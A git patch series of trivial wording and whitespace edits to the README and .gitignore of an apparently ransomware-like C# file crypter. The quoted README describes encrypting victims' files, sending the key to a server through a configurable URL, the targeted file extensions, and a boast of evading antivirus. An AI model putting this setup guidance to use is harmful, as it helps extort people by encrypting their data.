From 30968076eea7e1a2d9921bdcac37a42a28c1abab Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Tue, 14 Jan 2020 23:27:10 +0000 Subject: [PATCH 01/10] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a297964..9d6359a 100644 --- a/README.md +++ b/README.md @@ -12,7 +12,7 @@ It's a ransomware-like file crypter sample which can be modified for specific pu * Sends encryption key to a server. * Encrypted files can be decrypt in decrypter program with encryption key. * Creates a text file in Desktop with given message. -* Small file size (12 KB) +* Small file size (12 KB). * Doesn't detected to antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt **Demonstration Video** @@ -21,7 +21,7 @@ https://www.youtube.com/watch?v=LtiRISepIfs **Usage** -* You need to have a web server which supports scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping) +* You need to have a web server which support scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping) `string targetURL = "https://www.example.com/hidden-tear/write.php?info=";` @@ -33,7 +33,7 @@ https://www.youtube.com/watch?v=LtiRISepIfs var conent = new System.Net.WebClient().DownloadString(fullUrl); ``` -* Target file extensions can be change. Default list: +* Target file extensions can be change. Default lists: ``` var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"}; From f36dd34e8af7784c2be2a57909f81ebc955e1475 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Tue, 3 Mar 2020 18:18:37 +0100 Subject: [PATCH 02/10] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 9d6359a..23385c7 100644 --- a/README.md +++ b/README.md @@ -12,7 +12,7 @@ It's a ransomware-like file crypter sample which can be modified for specific pu * Sends encryption key to a server. * Encrypted files can be decrypt in decrypter program with encryption key. * Creates a text file in Desktop with given message. -* Small file size (12 KB). +* Small file size (13 KB). * Doesn't detected to antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt **Demonstration Video** From 293da628178fc650db15678e7f349d4f32de5b18 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:49:08 +0000 Subject: [PATCH 03/10] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 23385c7..75117ed 100644 --- a/README.md +++ b/README.md @@ -21,7 +21,7 @@ https://www.youtube.com/watch?v=LtiRISepIfs **Usage** -* You need to have a web server which support scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping) +* You need to have a web server which support scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping). `string targetURL = "https://www.example.com/hidden-tear/write.php?info=";` From 978acddb0ec5a67eeabb3611c55182746abec7b6 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:50:41 +0000 Subject: [PATCH 04/10] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 75117ed..ff41dd3 100644 --- a/README.md +++ b/README.md @@ -9,7 +9,7 @@ It's a ransomware-like file crypter sample which can be modified for specific pu **Features** * Uses AES algorithm to encrypt files. -* Sends encryption key to a server. +* Send encryption key to a server. * Encrypted files can be decrypt in decrypter program with encryption key. * Creates a text file in Desktop with given message. * Small file size (13 KB). From 0ea9f5f865fda387bb9022c5b661d2e525292456 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:51:57 +0000 Subject: [PATCH 05/10] Initial commit --- .gitignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index 57a1574..ad616f9 100644 --- a/.gitignore +++ b/.gitignore @@ -96,7 +96,7 @@ _ReSharper*/ # TeamCity is a build add-in _TeamCity* -# DotCover is a Code Coverage Tool +# DotCover is a Code Coverage Tools *.dotCover # NCrunch From 4f9105b8f1956514c748f318864eb81b49bdb7e2 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:52:28 +0000 Subject: [PATCH 06/10] Initial commit --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index ad616f9..00e5904 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,7 @@ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. + # User-specific files *.suo *.user From fdc2f52433dcf25d19bd0951f774dfe26e4d10f0 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:52:47 +0000 Subject: [PATCH 07/10] Initial commit --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index 00e5904..ad616f9 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,6 @@ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. - # User-specific files *.suo *.user From f3c2423254c4af2e99f853ed5da36a726451d85b Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene <47080616+nwolisaemmanuel2@users.noreply.github.com> Date: Wed, 11 Mar 2020 09:53:06 +0000 Subject: [PATCH 08/10] Initial commit --- .gitignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index ad616f9..cdfe323 100644 --- a/.gitignore +++ b/.gitignore @@ -25,7 +25,7 @@ bld/ # Visual Studo 2015 cache/options directory .vs/ -# MSTest test Results +# MSTest test Result [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* From 2b58869a4d6b89f5ed2139143de4d043492f08a0 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene Date: Wed, 8 Jul 2020 22:31:44 +0000 Subject: [PATCH 09/10] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ff41dd3..1ee9b92 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,7 @@ | | | | | (_| | (_| | __/ | | | | || __/ (_| | | |_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_| + It's a ransomware-like file crypter sample which can be modified for specific purposes. **Features** From 1a0eec6b7a11cfaf093083527401d7d842881759 Mon Sep 17 00:00:00 2001 From: Nwolisa Emmanuel Ekene Date: Wed, 8 Jul 2020 22:32:01 +0000 Subject: [PATCH 10/10] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 1ee9b92..7d854c5 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,7 @@ |_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_| + It's a ransomware-like file crypter sample which can be modified for specific purposes. **Features**